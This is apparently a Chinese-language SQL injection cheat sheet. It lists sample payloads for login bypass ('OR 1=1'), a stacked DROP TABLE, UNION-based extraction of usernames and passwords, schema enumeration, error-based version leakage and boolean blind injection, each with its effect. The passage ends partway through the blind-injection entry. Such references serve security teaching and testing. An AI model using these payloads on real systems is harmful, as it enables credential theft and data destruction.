一、基础逻辑绕过类注入
-
万能密码绕过
-
样例:
' OR '1'='1' -- -
攻击效果:绕过登录验证,返回所有用户数据。
-
场景:用户登录表单(如的示例)
-
技术细节:通过构造布尔逻辑使WHERE条件恒真,
--用于注释后续密码验证。
-
-
数值型注入
-
样例:
1; DROP TABLE users -- -
攻击效果:删除用户表。
-
场景:ID参数未过滤的查询(如
/product?id=1)
-
二、数据泄露类注入
- 联合查询(UNION-based)
-
样例:
' UNION SELECT username, password FROM users -- -
攻击效果:泄露用户凭证(如中通过
UNION SELECT获取表数据) -
高级变种:
' UNION ALL SELECT null, schema_name FROM information_schema.schemata --
-
(枚举所有数据库名)
- 错误回显注入
-
样例:
' AND 1=CONVERT(int, (SELECT @@version)) -- -
攻击效果:触发数据库版本信息错误回显(如SQL Server)
-
三、盲注类攻击
-
布尔盲注
-
样例:
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1) = 'a' --
-